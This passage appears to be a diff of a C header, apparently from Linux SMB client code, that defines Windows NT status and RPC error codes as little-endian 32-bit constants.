+-#define STATUS_ILLEGAL_DLL_RELOCATION cpu_to_le32(0xC0000269)
+-#define STATUS_LICENSE_VIOLATION cpu_to_le32(0xC000026A)
+-#define STATUS_DLL_INIT_FAILED_LOGOFF cpu_to_le32(0xC000026B)
+-#define STATUS_DRIVER_UNABLE_TO_LOAD cpu_to_le32(0xC000026C)
+-#define STATUS_DFS_UNAVAILABLE cpu_to_le32(0xC000026D)
+-#define STATUS_VOLUME_DISMOUNTED cpu_to_le32(0xC000026E)
+-#define STATUS_WX86_INTERNAL_ERROR cpu_to_le32(0xC000026F)
+-#define STATUS_WX86_FLOAT_STACK_CHECK cpu_to_le32(0xC0000270)
+-#define STATUS_VALIDATE_CONTINUE cpu_to_le32(0xC0000271)
+-#define STATUS_NO_MATCH cpu_to_le32(0xC0000272)
+-#define STATUS_NO_MORE_MATCHES cpu_to_le32(0xC0000273)
+-#define STATUS_NOT_A_REPARSE_POINT cpu_to_le32(0xC0000275)
+-#define STATUS_IO_REPARSE_TAG_INVALID cpu_to_le32(0xC0000276)
+-#define STATUS_IO_REPARSE_TAG_MISMATCH cpu_to_le32(0xC0000277)
+-#define STATUS_IO_REPARSE_DATA_INVALID cpu_to_le32(0xC0000278)
+-#define STATUS_IO_REPARSE_TAG_NOT_HANDLED cpu_to_le32(0xC0000279)
+-#define STATUS_REPARSE_POINT_NOT_RESOLVED cpu_to_le32(0xC0000280)
+-#define STATUS_DIRECTORY_IS_A_REPARSE_POINT cpu_to_le32(0xC0000281)
+-#define STATUS_RANGE_LIST_CONFLICT cpu_to_le32(0xC0000282)
+-#define STATUS_SOURCE_ELEMENT_EMPTY cpu_to_le32(0xC0000283)
+-#define STATUS_DESTINATION_ELEMENT_FULL cpu_to_le32(0xC0000284)
+-#define STATUS_ILLEGAL_ELEMENT_ADDRESS cpu_to_le32(0xC0000285)
+-#define STATUS_MAGAZINE_NOT_PRESENT cpu_to_le32(0xC0000286)
+-#define STATUS_REINITIALIZATION_NEEDED cpu_to_le32(0xC0000287)
+-#define STATUS_ENCRYPTION_FAILED cpu_to_le32(0xC000028A)
+-#define STATUS_DECRYPTION_FAILED cpu_to_le32(0xC000028B)
+-#define STATUS_RANGE_NOT_FOUND cpu_to_le32(0xC000028C)
+-#define STATUS_NO_RECOVERY_POLICY cpu_to_le32(0xC000028D)
+-#define STATUS_NO_EFS cpu_to_le32(0xC000028E)
+-#define STATUS_WRONG_EFS cpu_to_le32(0xC000028F)
+-#define STATUS_NO_USER_KEYS cpu_to_le32(0xC0000290)
+-#define STATUS_FILE_NOT_ENCRYPTED cpu_to_le32(0xC0000291)
+-#define STATUS_NOT_EXPORT_FORMAT cpu_to_le32(0xC0000292)
+-#define STATUS_FILE_ENCRYPTED cpu_to_le32(0xC0000293)
+-#define STATUS_WMI_GUID_NOT_FOUND cpu_to_le32(0xC0000295)
+-#define STATUS_WMI_INSTANCE_NOT_FOUND cpu_to_le32(0xC0000296)
+-#define STATUS_WMI_ITEMID_NOT_FOUND cpu_to_le32(0xC0000297)
+-#define STATUS_WMI_TRY_AGAIN cpu_to_le32(0xC0000298)
+-#define STATUS_SHARED_POLICY cpu_to_le32(0xC0000299)
+-#define STATUS_POLICY_OBJECT_NOT_FOUND cpu_to_le32(0xC000029A)
+-#define STATUS_POLICY_ONLY_IN_DS cpu_to_le32(0xC000029B)
+-#define STATUS_VOLUME_NOT_UPGRADED cpu_to_le32(0xC000029C)
+-#define STATUS_REMOTE_STORAGE_NOT_ACTIVE cpu_to_le32(0xC000029D)
+-#define STATUS_REMOTE_STORAGE_MEDIA_ERROR cpu_to_le32(0xC000029E)
+-#define STATUS_NO_TRACKING_SERVICE cpu_to_le32(0xC000029F)
+-#define STATUS_SERVER_SID_MISMATCH cpu_to_le32(0xC00002A0)
+-#define STATUS_DS_NO_ATTRIBUTE_OR_VALUE cpu_to_le32(0xC00002A1)
+-#define STATUS_DS_INVALID_ATTRIBUTE_SYNTAX cpu_to_le32(0xC00002A2)
+-#define STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED cpu_to_le32(0xC00002A3)
+-#define STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS cpu_to_le32(0xC00002A4)
+-#define STATUS_DS_BUSY cpu_to_le32(0xC00002A5)
+-#define STATUS_DS_UNAVAILABLE cpu_to_le32(0xC00002A6)
+-#define STATUS_DS_NO_RIDS_ALLOCATED cpu_to_le32(0xC00002A7)
+-#define STATUS_DS_NO_MORE_RIDS cpu_to_le32(0xC00002A8)
+-#define STATUS_DS_INCORRECT_ROLE_OWNER cpu_to_le32(0xC00002A9)
+-#define STATUS_DS_RIDMGR_INIT_ERROR cpu_to_le32(0xC00002AA)
+-#define STATUS_DS_OBJ_CLASS_VIOLATION cpu_to_le32(0xC00002AB)
+-#define STATUS_DS_CANT_ON_NON_LEAF cpu_to_le32(0xC00002AC)
+-#define STATUS_DS_CANT_ON_RDN cpu_to_le32(0xC00002AD)
+-#define STATUS_DS_CANT_MOD_OBJ_CLASS cpu_to_le32(0xC00002AE)
+-#define STATUS_DS_CROSS_DOM_MOVE_FAILED cpu_to_le32(0xC00002AF)
+-#define STATUS_DS_GC_NOT_AVAILABLE cpu_to_le32(0xC00002B0)
+-#define STATUS_DIRECTORY_SERVICE_REQUIRED cpu_to_le32(0xC00002B1)
+-#define STATUS_REPARSE_ATTRIBUTE_CONFLICT cpu_to_le32(0xC00002B2)
+-#define STATUS_CANT_ENABLE_DENY_ONLY cpu_to_le32(0xC00002B3)
+-#define STATUS_FLOAT_MULTIPLE_FAULTS cpu_to_le32(0xC00002B4)
+-#define STATUS_FLOAT_MULTIPLE_TRAPS cpu_to_le32(0xC00002B5)
+-#define STATUS_DEVICE_REMOVED cpu_to_le32(0xC00002B6)
+-#define STATUS_JOURNAL_DELETE_IN_PROGRESS cpu_to_le32(0xC00002B7)
+-#define STATUS_JOURNAL_NOT_ACTIVE cpu_to_le32(0xC00002B8)
+-#define STATUS_NOINTERFACE cpu_to_le32(0xC00002B9)
+-#define STATUS_DS_ADMIN_LIMIT_EXCEEDED cpu_to_le32(0xC00002C1)
+-#define STATUS_DRIVER_FAILED_SLEEP cpu_to_le32(0xC00002C2)
+-#define STATUS_MUTUAL_AUTHENTICATION_FAILED cpu_to_le32(0xC00002C3)
+-#define STATUS_CORRUPT_SYSTEM_FILE cpu_to_le32(0xC00002C4)
+-#define STATUS_DATATYPE_MISALIGNMENT_ERROR cpu_to_le32(0xC00002C5)
+-#define STATUS_WMI_READ_ONLY cpu_to_le32(0xC00002C6)
+-#define STATUS_WMI_SET_FAILURE cpu_to_le32(0xC00002C7)
+-#define STATUS_COMMITMENT_MINIMUM cpu_to_le32(0xC00002C8)
+-#define STATUS_REG_NAT_CONSUMPTION cpu_to_le32(0xC00002C9)
+-#define STATUS_TRANSPORT_FULL cpu_to_le32(0xC00002CA)
+-#define STATUS_DS_SAM_INIT_FAILURE cpu_to_le32(0xC00002CB)
+-#define STATUS_ONLY_IF_CONNECTED cpu_to_le32(0xC00002CC)
+-#define STATUS_DS_SENSITIVE_GROUP_VIOLATION cpu_to_le32(0xC00002CD)
+-#define STATUS_PNP_RESTART_ENUMERATION cpu_to_le32(0xC00002CE)
+-#define STATUS_JOURNAL_ENTRY_DELETED cpu_to_le32(0xC00002CF)
+-#define STATUS_DS_CANT_MOD_PRIMARYGROUPID cpu_to_le32(0xC00002D0)
+-#define STATUS_SYSTEM_IMAGE_BAD_SIGNATURE cpu_to_le32(0xC00002D1)
+-#define STATUS_PNP_REBOOT_REQUIRED cpu_to_le32(0xC00002D2)
+-#define STATUS_POWER_STATE_INVALID cpu_to_le32(0xC00002D3)
+-#define STATUS_DS_INVALID_GROUP_TYPE cpu_to_le32(0xC00002D4)
+-#define STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D5)
+-#define STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D6)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D7)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC00002D8)
+-#define STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D9)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER cpu_to_le32(0xC00002DA)
+-#define STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER	\
+-	cpu_to_le32(0xC00002DB)
+-#define STATUS_DS_HAVE_PRIMARY_MEMBERS cpu_to_le32(0xC00002DC)
+-#define STATUS_WMI_NOT_SUPPORTED cpu_to_le32(0xC00002DD)
+-#define STATUS_INSUFFICIENT_POWER cpu_to_le32(0xC00002DE)
+-#define STATUS_SAM_NEED_BOOTKEY_PASSWORD cpu_to_le32(0xC00002DF)
+-#define STATUS_SAM_NEED_BOOTKEY_FLOPPY cpu_to_le32(0xC00002E0)
+-#define STATUS_DS_CANT_START cpu_to_le32(0xC00002E1)
+-#define STATUS_DS_INIT_FAILURE cpu_to_le32(0xC00002E2)
+-#define STATUS_SAM_INIT_FAILURE cpu_to_le32(0xC00002E3)
+-#define STATUS_DS_GC_REQUIRED cpu_to_le32(0xC00002E4)
+-#define STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY cpu_to_le32(0xC00002E5)
+-#define STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS cpu_to_le32(0xC00002E6)
+-#define STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED cpu_to_le32(0xC00002E7)
+-#define STATUS_MULTIPLE_FAULT_VIOLATION cpu_to_le32(0xC00002E8)
+-#define STATUS_CURRENT_DOMAIN_NOT_ALLOWED cpu_to_le32(0xC00002E9)
+-#define STATUS_CANNOT_MAKE cpu_to_le32(0xC00002EA)
+-#define STATUS_SYSTEM_SHUTDOWN cpu_to_le32(0xC00002EB)
+-#define STATUS_DS_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002EC)
+-#define STATUS_DS_SAM_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002ED)
+-#define STATUS_UNFINISHED_CONTEXT_DELETED cpu_to_le32(0xC00002EE)
+-#define STATUS_NO_TGT_REPLY cpu_to_le32(0xC00002EF)
+-#define STATUS_OBJECTID_NOT_FOUND cpu_to_le32(0xC00002F0)
+-#define STATUS_NO_IP_ADDRESSES cpu_to_le32(0xC00002F1)
+-#define STATUS_WRONG_CREDENTIAL_HANDLE cpu_to_le32(0xC00002F2)
+-#define STATUS_CRYPTO_SYSTEM_INVALID cpu_to_le32(0xC00002F3)
+-#define STATUS_MAX_REFERRALS_EXCEEDED cpu_to_le32(0xC00002F4)
+-#define STATUS_MUST_BE_KDC cpu_to_le32(0xC00002F5)
+-#define STATUS_STRONG_CRYPTO_NOT_SUPPORTED cpu_to_le32(0xC00002F6)
+-#define STATUS_TOO_MANY_PRINCIPALS cpu_to_le32(0xC00002F7)
+-#define STATUS_NO_PA_DATA cpu_to_le32(0xC00002F8)
+-#define STATUS_PKINIT_NAME_MISMATCH cpu_to_le32(0xC00002F9)
+-#define STATUS_SMARTCARD_LOGON_REQUIRED cpu_to_le32(0xC00002FA)
+-#define STATUS_KDC_INVALID_REQUEST cpu_to_le32(0xC00002FB)
+-#define STATUS_KDC_UNABLE_TO_REFER cpu_to_le32(0xC00002FC)
+-#define STATUS_KDC_UNKNOWN_ETYPE cpu_to_le32(0xC00002FD)
+-#define STATUS_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FE)
+-#define STATUS_SERVER_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FF)
+-#define STATUS_NOT_SUPPORTED_ON_SBS cpu_to_le32(0xC0000300)
+-#define STATUS_WMI_GUID_DISCONNECTED cpu_to_le32(0xC0000301)
+-#define STATUS_WMI_ALREADY_DISABLED cpu_to_le32(0xC0000302)
+-#define STATUS_WMI_ALREADY_ENABLED cpu_to_le32(0xC0000303)
+-#define STATUS_MFT_TOO_FRAGMENTED cpu_to_le32(0xC0000304)
+-#define STATUS_COPY_PROTECTION_FAILURE cpu_to_le32(0xC0000305)
+-#define STATUS_CSS_AUTHENTICATION_FAILURE cpu_to_le32(0xC0000306)
+-#define STATUS_CSS_KEY_NOT_PRESENT cpu_to_le32(0xC0000307)
+-#define STATUS_CSS_KEY_NOT_ESTABLISHED cpu_to_le32(0xC0000308)
+-#define STATUS_CSS_SCRAMBLED_SECTOR cpu_to_le32(0xC0000309)
+-#define STATUS_CSS_REGION_MISMATCH cpu_to_le32(0xC000030A)
+-#define STATUS_CSS_RESETS_EXHAUSTED cpu_to_le32(0xC000030B)
+-#define STATUS_PKINIT_FAILURE cpu_to_le32(0xC0000320)
+-#define STATUS_SMARTCARD_SUBSYSTEM_FAILURE cpu_to_le32(0xC0000321)
+-#define STATUS_NO_KERB_KEY cpu_to_le32(0xC0000322)
+-#define STATUS_HOST_DOWN cpu_to_le32(0xC0000350)
+-#define STATUS_UNSUPPORTED_PREAUTH cpu_to_le32(0xC0000351)
+-#define STATUS_EFS_ALG_BLOB_TOO_BIG cpu_to_le32(0xC0000352)
+-#define STATUS_PORT_NOT_SET cpu_to_le32(0xC0000353)
+-#define STATUS_DEBUGGER_INACTIVE cpu_to_le32(0xC0000354)
+-#define STATUS_DS_VERSION_CHECK_FAILURE cpu_to_le32(0xC0000355)
+-#define STATUS_AUDITING_DISABLED cpu_to_le32(0xC0000356)
+-#define STATUS_PRENT4_MACHINE_ACCOUNT cpu_to_le32(0xC0000357)
+-#define STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC0000358)
+-#define STATUS_INVALID_IMAGE_WIN_32 cpu_to_le32(0xC0000359)
+-#define STATUS_INVALID_IMAGE_WIN_64 cpu_to_le32(0xC000035A)
+-#define STATUS_BAD_BINDINGS cpu_to_le32(0xC000035B)
+-#define STATUS_NETWORK_SESSION_EXPIRED cpu_to_le32(0xC000035C)
+-#define STATUS_APPHELP_BLOCK cpu_to_le32(0xC000035D)
+-#define STATUS_ALL_SIDS_FILTERED cpu_to_le32(0xC000035E)
+-#define STATUS_NOT_SAFE_MODE_DRIVER cpu_to_le32(0xC000035F)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT cpu_to_le32(0xC0000361)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_PATH cpu_to_le32(0xC0000362)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER cpu_to_le32(0xC0000363)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_OTHER cpu_to_le32(0xC0000364)
+-#define STATUS_FAILED_DRIVER_ENTRY cpu_to_le32(0xC0000365)
+-#define STATUS_DEVICE_ENUMERATION_ERROR cpu_to_le32(0xC0000366)
+-#define STATUS_MOUNT_POINT_NOT_RESOLVED cpu_to_le32(0xC0000368)
+-#define STATUS_INVALID_DEVICE_OBJECT_PARAMETER cpu_to_le32(0xC0000369)
+-#define STATUS_MCA_OCCURRED cpu_to_le32(0xC000036A)
+-#define STATUS_DRIVER_BLOCKED_CRITICAL cpu_to_le32(0xC000036B)
+-#define STATUS_DRIVER_BLOCKED cpu_to_le32(0xC000036C)
+-#define STATUS_DRIVER_DATABASE_ERROR cpu_to_le32(0xC000036D)
+-#define STATUS_SYSTEM_HIVE_TOO_LARGE cpu_to_le32(0xC000036E)
+-#define STATUS_INVALID_IMPORT_OF_NON_DLL cpu_to_le32(0xC000036F)
+-#define STATUS_NO_SECRETS cpu_to_le32(0xC0000371)
+-#define STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY cpu_to_le32(0xC0000372)
+-#define STATUS_FAILED_STACK_SWITCH cpu_to_le32(0xC0000373)
+-#define STATUS_HEAP_CORRUPTION cpu_to_le32(0xC0000374)
+-#define STATUS_SMARTCARD_WRONG_PIN cpu_to_le32(0xC0000380)
+-#define STATUS_SMARTCARD_CARD_BLOCKED cpu_to_le32(0xC0000381)
+-#define STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED cpu_to_le32(0xC0000382)
+-#define STATUS_SMARTCARD_NO_CARD cpu_to_le32(0xC0000383)
+-#define STATUS_SMARTCARD_NO_KEY_CONTAINER cpu_to_le32(0xC0000384)
+-#define STATUS_SMARTCARD_NO_CERTIFICATE cpu_to_le32(0xC0000385)
+-#define STATUS_SMARTCARD_NO_KEYSET cpu_to_le32(0xC0000386)
+-#define STATUS_SMARTCARD_IO_ERROR cpu_to_le32(0xC0000387)
+-#define STATUS_DOWNGRADE_DETECTED cpu_to_le32(0xC0000388)
+-#define STATUS_SMARTCARD_CERT_REVOKED cpu_to_le32(0xC0000389)
+-#define STATUS_ISSUING_CA_UNTRUSTED cpu_to_le32(0xC000038A)
+-#define STATUS_REVOCATION_OFFLINE_C cpu_to_le32(0xC000038B)
+-#define STATUS_PKINIT_CLIENT_FAILURE cpu_to_le32(0xC000038C)
+-#define STATUS_SMARTCARD_CERT_EXPIRED cpu_to_le32(0xC000038D)
+-#define STATUS_DRIVER_FAILED_PRIOR_UNLOAD cpu_to_le32(0xC000038E)
+-#define STATUS_SMARTCARD_SILENT_CONTEXT cpu_to_le32(0xC000038F)
+-#define STATUS_PER_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000401)
+-#define STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000402)
+-#define STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000403)
+-#define STATUS_DS_NAME_NOT_UNIQUE cpu_to_le32(0xC0000404)
+-#define STATUS_DS_DUPLICATE_ID_FOUND cpu_to_le32(0xC0000405)
+-#define STATUS_DS_GROUP_CONVERSION_ERROR cpu_to_le32(0xC0000406)
+-#define STATUS_VOLSNAP_PREPARE_HIBERNATE cpu_to_le32(0xC0000407)
+-#define STATUS_USER2USER_REQUIRED cpu_to_le32(0xC0000408)
+-#define STATUS_STACK_BUFFER_OVERRUN cpu_to_le32(0xC0000409)
+-#define STATUS_NO_S4U_PROT_SUPPORT cpu_to_le32(0xC000040A)
+-#define STATUS_CROSSREALM_DELEGATION_FAILURE cpu_to_le32(0xC000040B)
+-#define STATUS_REVOCATION_OFFLINE_KDC cpu_to_le32(0xC000040C)
+-#define STATUS_ISSUING_CA_UNTRUSTED_KDC cpu_to_le32(0xC000040D)
+-#define STATUS_KDC_CERT_EXPIRED cpu_to_le32(0xC000040E)
+-#define STATUS_KDC_CERT_REVOKED cpu_to_le32(0xC000040F)
+-#define STATUS_PARAMETER_QUOTA_EXCEEDED cpu_to_le32(0xC0000410)
+-#define STATUS_HIBERNATION_FAILURE cpu_to_le32(0xC0000411)
+-#define STATUS_DELAY_LOAD_FAILED cpu_to_le32(0xC0000412)
+-#define STATUS_AUTHENTICATION_FIREWALL_FAILED cpu_to_le32(0xC0000413)
+-#define STATUS_VDM_DISALLOWED cpu_to_le32(0xC0000414)
+-#define STATUS_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC0000415)
+-#define STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE	\
+-	cpu_to_le32(0xC0000416)
+-#define STATUS_INVALID_CRUNTIME_PARAMETER cpu_to_le32(0xC0000417)
+-#define STATUS_NTLM_BLOCKED cpu_to_le32(0xC0000418)
+-#define STATUS_ASSERTION_FAILURE cpu_to_le32(0xC0000420)
+-#define STATUS_VERIFIER_STOP cpu_to_le32(0xC0000421)
+-#define STATUS_CALLBACK_POP_STACK cpu_to_le32(0xC0000423)
+-#define STATUS_INCOMPATIBLE_DRIVER_BLOCKED cpu_to_le32(0xC0000424)
+-#define STATUS_HIVE_UNLOADED cpu_to_le32(0xC0000425)
+-#define STATUS_COMPRESSION_DISABLED cpu_to_le32(0xC0000426)
+-#define STATUS_FILE_SYSTEM_LIMITATION cpu_to_le32(0xC0000427)
+-#define STATUS_INVALID_IMAGE_HASH cpu_to_le32(0xC0000428)
+-#define STATUS_NOT_CAPABLE cpu_to_le32(0xC0000429)
+-#define STATUS_REQUEST_OUT_OF_SEQUENCE cpu_to_le32(0xC000042A)
+-#define STATUS_IMPLEMENTATION_LIMIT cpu_to_le32(0xC000042B)
+-#define STATUS_ELEVATION_REQUIRED cpu_to_le32(0xC000042C)
+-#define STATUS_BEYOND_VDL cpu_to_le32(0xC0000432)
+-#define STATUS_ENCOUNTERED_WRITE_IN_PROGRESS cpu_to_le32(0xC0000433)
+-#define STATUS_PTE_CHANGED cpu_to_le32(0xC0000434)
+-#define STATUS_PURGE_FAILED cpu_to_le32(0xC0000435)
+-#define STATUS_CRED_REQUIRES_CONFIRMATION cpu_to_le32(0xC0000440)
+-#define STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE cpu_to_le32(0xC0000441)
+-#define STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER cpu_to_le32(0xC0000442)
+-#define STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE cpu_to_le32(0xC0000443)
+-#define STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE cpu_to_le32(0xC0000444)
+-#define STATUS_CS_ENCRYPTION_FILE_NOT_CSE cpu_to_le32(0xC0000445)
+-#define STATUS_INVALID_LABEL cpu_to_le32(0xC0000446)
+-#define STATUS_DRIVER_PROCESS_TERMINATED cpu_to_le32(0xC0000450)
+-#define STATUS_AMBIGUOUS_SYSTEM_DEVICE cpu_to_le32(0xC0000451)
+-#define STATUS_SYSTEM_DEVICE_NOT_FOUND cpu_to_le32(0xC0000452)
+-#define STATUS_RESTART_BOOT_APPLICATION cpu_to_le32(0xC0000453)
+-#define STATUS_INVALID_TASK_NAME cpu_to_le32(0xC0000500)
+-#define STATUS_INVALID_TASK_INDEX cpu_to_le32(0xC0000501)
+-#define STATUS_THREAD_ALREADY_IN_TASK cpu_to_le32(0xC0000502)
+-#define STATUS_CALLBACK_BYPASS cpu_to_le32(0xC0000503)
+-#define STATUS_PORT_CLOSED cpu_to_le32(0xC0000700)
+-#define STATUS_MESSAGE_LOST cpu_to_le32(0xC0000701)
+-#define STATUS_INVALID_MESSAGE cpu_to_le32(0xC0000702)
+-#define STATUS_REQUEST_CANCELED cpu_to_le32(0xC0000703)
+-#define STATUS_RECURSIVE_DISPATCH cpu_to_le32(0xC0000704)
+-#define STATUS_LPC_RECEIVE_BUFFER_EXPECTED cpu_to_le32(0xC0000705)
+-#define STATUS_LPC_INVALID_CONNECTION_USAGE cpu_to_le32(0xC0000706)
+-#define STATUS_LPC_REQUESTS_NOT_ALLOWED cpu_to_le32(0xC0000707)
+-#define STATUS_RESOURCE_IN_USE cpu_to_le32(0xC0000708)
+-#define STATUS_HARDWARE_MEMORY_ERROR cpu_to_le32(0xC0000709)
+-#define STATUS_THREADPOOL_HANDLE_EXCEPTION cpu_to_le32(0xC000070A)
+-#define STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED cpu_to_le32(0xC000070B)
+-#define STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED	\
+-	cpu_to_le32(0xC000070C)
+-#define STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED	\
+-	cpu_to_le32(0xC000070D)
+-#define STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED	\
+-	cpu_to_le32(0xC000070E)
+-#define STATUS_THREADPOOL_RELEASED_DURING_OPERATION cpu_to_le32(0xC000070F)
+-#define STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000710)
+-#define STATUS_APC_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000711)
+-#define STATUS_PROCESS_IS_PROTECTED cpu_to_le32(0xC0000712)
+-#define STATUS_MCA_EXCEPTION cpu_to_le32(0xC0000713)
+-#define STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE cpu_to_le32(0xC0000714)
+-#define STATUS_SYMLINK_CLASS_DISABLED cpu_to_le32(0xC0000715)
+-#define STATUS_INVALID_IDN_NORMALIZATION cpu_to_le32(0xC0000716)
+-#define STATUS_NO_UNICODE_TRANSLATION cpu_to_le32(0xC0000717)
+-#define STATUS_ALREADY_REGISTERED cpu_to_le32(0xC0000718)
+-#define STATUS_CONTEXT_MISMATCH cpu_to_le32(0xC0000719)
+-#define STATUS_PORT_ALREADY_HAS_COMPLETION_LIST cpu_to_le32(0xC000071A)
+-#define STATUS_CALLBACK_RETURNED_THREAD_PRIORITY cpu_to_le32(0xC000071B)
+-#define STATUS_INVALID_THREAD cpu_to_le32(0xC000071C)
+-#define STATUS_CALLBACK_RETURNED_TRANSACTION cpu_to_le32(0xC000071D)
+-#define STATUS_CALLBACK_RETURNED_LDR_LOCK cpu_to_le32(0xC000071E)
+-#define STATUS_CALLBACK_RETURNED_LANG cpu_to_le32(0xC000071F)
+-#define STATUS_CALLBACK_RETURNED_PRI_BACK cpu_to_le32(0xC0000720)
+-#define STATUS_CALLBACK_RETURNED_THREAD_AFFINITY cpu_to_le32(0xC0000721)
+-#define STATUS_DISK_REPAIR_DISABLED cpu_to_le32(0xC0000800)
+-#define STATUS_DS_DOMAIN_RENAME_IN_PROGRESS cpu_to_le32(0xC0000801)
+-#define STATUS_DISK_QUOTA_EXCEEDED cpu_to_le32(0xC0000802)
+-#define STATUS_CONTENT_BLOCKED cpu_to_le32(0xC0000804)
+-#define STATUS_BAD_CLUSTERS cpu_to_le32(0xC0000805)
+-#define STATUS_VOLUME_DIRTY cpu_to_le32(0xC0000806)
+-#define STATUS_FILE_CHECKED_OUT cpu_to_le32(0xC0000901)
+-#define STATUS_CHECKOUT_REQUIRED cpu_to_le32(0xC0000902)
+-#define STATUS_BAD_FILE_TYPE cpu_to_le32(0xC0000903)
+-#define STATUS_FILE_TOO_LARGE cpu_to_le32(0xC0000904)
+-#define STATUS_FORMS_AUTH_REQUIRED cpu_to_le32(0xC0000905)
+-#define STATUS_VIRUS_INFECTED cpu_to_le32(0xC0000906)
+-#define STATUS_VIRUS_DELETED cpu_to_le32(0xC0000907)
+-#define STATUS_BAD_MCFG_TABLE cpu_to_le32(0xC0000908)
+-#define STATUS_WOW_ASSERTION cpu_to_le32(0xC0009898)
+-#define STATUS_INVALID_SIGNATURE cpu_to_le32(0xC000A000)
+-#define STATUS_HMAC_NOT_SUPPORTED cpu_to_le32(0xC000A001)
+-#define STATUS_IPSEC_QUEUE_OVERFLOW cpu_to_le32(0xC000A010)
+-#define STATUS_ND_QUEUE_OVERFLOW cpu_to_le32(0xC000A011)
+-#define STATUS_HOPLIMIT_EXCEEDED cpu_to_le32(0xC000A012)
+-#define STATUS_PROTOCOL_NOT_SUPPORTED cpu_to_le32(0xC000A013)
+-#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED	\
+-	cpu_to_le32(0xC000A080)
+-#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR	\
+-	cpu_to_le32(0xC000A081)
+-#define STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR cpu_to_le32(0xC000A082)
+-#define STATUS_XML_PARSE_ERROR cpu_to_le32(0xC000A083)
+-#define STATUS_XMLDSIG_ERROR cpu_to_le32(0xC000A084)
+-#define STATUS_WRONG_COMPARTMENT cpu_to_le32(0xC000A085)
+-#define STATUS_AUTHIP_FAILURE cpu_to_le32(0xC000A086)
+-#define DBG_NO_STATE_CHANGE cpu_to_le32(0xC0010001)
+-#define DBG_APP_NOT_IDLE cpu_to_le32(0xC0010002)
+-#define RPC_NT_INVALID_STRING_BINDING cpu_to_le32(0xC0020001)
+-#define RPC_NT_WRONG_KIND_OF_BINDING cpu_to_le32(0xC0020002)
+-#define RPC_NT_INVALID_BINDING cpu_to_le32(0xC0020003)
+-#define RPC_NT_PROTSEQ_NOT_SUPPORTED cpu_to_le32(0xC0020004)
+-#define RPC_NT_INVALID_RPC_PROTSEQ cpu_to_le32(0xC0020005)
+-#define RPC_NT_INVALID_STRING_UUID cpu_to_le32(0xC0020006)
+-#define RPC_NT_INVALID_ENDPOINT_FORMAT cpu_to_le32(0xC0020007)
+-#define RPC_NT_INVALID_NET_ADDR cpu_to_le32(0xC0020008)
+-#define RPC_NT_NO_ENDPOINT_FOUND cpu_to_le32(0xC0020009)
+-#define RPC_NT_INVALID_TIMEOUT cpu_to_le32(0xC002000A)
+-#define RPC_NT_OBJECT_NOT_FOUND cpu_to_le32(0xC002000B)
+-#define RPC_NT_ALREADY_REGISTERED cpu_to_le32(0xC002000C)
+-#define RPC_NT_TYPE_ALREADY_REGISTERED cpu_to_le32(0xC002000D)
+-#define RPC_NT_ALREADY_LISTENING cpu_to_le32(0xC002000E)
+-#define RPC_NT_NO_PROTSEQS_REGISTERED cpu_to_le32(0xC002000F)
+-#define RPC_NT_NOT_LISTENING cpu_to_le32(0xC0020010)
+-#define RPC_NT_UNKNOWN_MGR_TYPE cpu_to_le32(0xC0020011)
+-#define RPC_NT_UNKNOWN_IF cpu_to_le32(0xC0020012)
+-#define RPC_NT_NO_BINDINGS cpu_to_le32(0xC0020013)
+-#define RPC_NT_NO_PROTSEQS cpu_to_le32(0xC0020014)
+-#define RPC_NT_CANT_CREATE_ENDPOINT cpu_to_le32(0xC0020015)
+-#define RPC_NT_OUT_OF_RESOURCES cpu_to_le32(0xC0020016)
+-#define RPC_NT_SERVER_UNAVAILABLE cpu_to_le32(0xC0020017)
+-#define RPC_NT_SERVER_TOO_BUSY cpu_to_le32(0xC0020018)
